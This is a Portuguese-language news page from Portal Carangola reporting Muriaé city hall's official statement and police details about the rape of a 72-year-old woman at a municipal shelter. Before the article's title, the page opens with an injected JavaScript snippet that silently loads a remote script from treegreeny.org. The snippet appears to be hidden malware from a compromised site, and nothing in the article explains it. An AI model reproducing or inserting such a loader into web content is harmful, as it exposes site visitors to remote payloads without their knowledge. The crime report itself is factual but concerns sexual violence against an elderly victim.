;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prefeitura de Muriaé emite Nota Oficial sobre estupro ocorrido na Casa Acolhedora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Prefeitura de Muriaé emite Nota Oficial sobre estupro ocorrido na Casa Acolhedora.

“A respeito deste fato, assim que a Prefeitura tomou ciência do ocorrido, a Polícia Militar foi acionada e o autor, preso. Informamos ainda que a equipe da Casa Acolhedora acompanhou a vítima durante seu depoimento na delegacia. A Prefeitura de Muriaé repudia o fato ocorrido e segue prestando todo o apoio necessário à vítima”, diz a Nota.

O fato ocorrido em Muriaé na Casa Acolhedora da Prefeitura repercutiu na imprensa de Minas Gerais, quando um homem de 34 anos foi preso acusado de estuprar uma senhora de 72 anos, a qual já estava na casa há alguns meses. O acusado seria morador da cidade de São Sebastião da Vargem Alegre e teria praticado o estupro por quatro vezes a noite e madrugada e ameaçava a vítima. A prisão foi feita pela Polícia Militar e agora as investigações estão a cargo da Polícia Civil que vai fazer algumas recomendações à Prefeitura sobre a estrutura da Casa Acolhedora e outros procedimentos.

INFORMAÇÕES OFICIAIS DA POLÍCIA CIVIL. “A Direção da CASA ACOLHEDORA acionou a Polícia Militar relatando um possível caso de Estupro. Durante a madrugada do dia 26 um homem procedente da cidade vizinha de São Sebastião da Vargem Alegre, que buscara abrigo no local durante aquele dia, saiu de seu quarto e adentrou no aposento da idosa vítima, de 72 anos, obrigando-a a praticar atos libidinosos com ele. Câmeras do circuito de segurança do local registraram as seguidas entradas do autor no quarto da vítima. Em sede policial ele confessou ter adentrado ao quarto da idosa para satisfazer sua lascívia sexual e por isso foi autuado em flagrante delito pelo Crime de Estupro de Vulnerável cuja pena, em caso de condenação, pode chegar a 15 anos”.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.